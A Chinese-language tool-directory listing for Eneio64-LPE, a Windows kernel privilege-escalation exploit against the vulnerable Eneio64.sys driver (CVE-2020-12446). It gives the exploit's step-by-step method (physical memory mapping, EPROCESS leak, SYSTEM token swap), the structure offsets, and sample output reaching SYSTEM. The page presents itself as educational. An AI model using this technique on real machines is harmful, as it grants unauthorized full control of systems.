Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Eneio64-LPE — 一个针对 CVE-2020-12446 Eneio64.sys 的漏洞利用。使用 SuperFetch 进行地址转换。 | Kitploit
工具/GitHubGitHub/s1lkys/eneio64-lpe
权限提升漏洞利用学习与教育二进制利用
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

一个针对 CVE-2020-12446 Eneio64.sys 的漏洞利用。使用 SuperFetch 进行地址转换。

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
  1. 打开到易受攻击驱动的句柄
  2. 将物理内存映射到用户空间
  3. 打开到系统进程的句柄
  4. 查询当前进程的 SystemHandleInformation 表,以获取泄露其 EPROCESS 地址的系统句柄。
  5. 遍历系统 EPROCESS 的 ActiveProcessLinks 向前链(flink),直到找到当前进程的 PID。
  6. 将当前进程的令牌替换为系统进程的令牌
  7. 生成一个新的 PowerShell 进程。

使用 Superfetch 方法进行虚拟到物理地址转换,而非泄露 CR3 并遍历页表。

已在 Win11 21H2 上测试

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] 物理内存总量:~0x7fef2000 字节
[+] 物理内存映射到 000002A3A4FC0000
[+] 泄露系统 EPROCESS
[+] 打开到 SYSTEM 进程(PID 4)的句柄
>    当前 PID:3932
>    句柄值:0x5c
[+] 查询当前进程的 SystemHandleInformation 表
[+] 句柄表查询成功
>    缓冲区大小:1048576 字节
>    调整轮次:15
>    总句柄数:29211
[+] 在句柄表中搜索句柄 0x5c
[+] 在索引 29183 / 29211 处找到匹配
>    PID:3932
>    句柄:0x5c
>    对象(系统 EPROCESS):0xffff858ca1885040
[+] 搜索当前进程令牌。从系统向前链(系统 EPROCESS + 0x448)遍历 ActiveProcessLinks 直到当前 PID
[+] 下一个向前链地址 - 0x448 = 下一个 EPROCESS
[+] 找到当前进程(PID 3932)令牌位于 [0x72cd25f8]
[+] 用 SYSTEM 令牌替换当前令牌
[!] ==== 当前 PID 的向前链地址 - EPROCESS ActiveProcessLinks 偏移(0x448) + EPROCESS 令牌偏移(0x4B8) = 当前令牌 ====
[+] 令牌已替换。
Microsoft Windows [版本 10.0.20348.2849]
(c) Microsoft Corporation。保留所有权利。

C:\Users\Public>whoami
nt authority\system

仅用于教育用途!

下载工具